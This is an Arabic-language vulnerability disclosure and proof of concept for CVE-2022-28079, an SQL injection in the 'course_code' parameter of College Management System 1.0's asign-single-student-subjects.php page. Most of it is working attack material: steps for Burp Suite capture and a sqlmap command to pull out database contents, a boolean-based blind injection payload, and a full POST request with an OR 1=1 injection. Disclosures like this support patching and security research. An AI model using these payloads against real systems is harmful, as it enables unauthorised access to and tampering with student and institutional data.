
CVE-2022-28079
يسمح نظام إدارة الكلية 1.0 بحقن SQL عبر المعامل 'course_code' في /College-Management-System/admin/asign-single-student-subjects.php. قد يسمح استغلال هذه الثغرة للمهاجم باختراق التطبيق، أو الوصول إلى البيانات أو تعديلها، أو استغلال نقاط ضعف كامنة في قاعدة البيانات الأساسية.
في Burpsuite قم باعتراض الطلب من الصفحة المتأثرة باستخدام المعامل 'course_code' واحفظه باسم poc.req. ثم قم بتشغيل SQLmap لاستخراج البيانات من قاعدة البيانات:
sqlmap -r poc.req --dbms=mysql
أعمى قائم على القيم المنطقية الحمولة: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ
POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe
Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns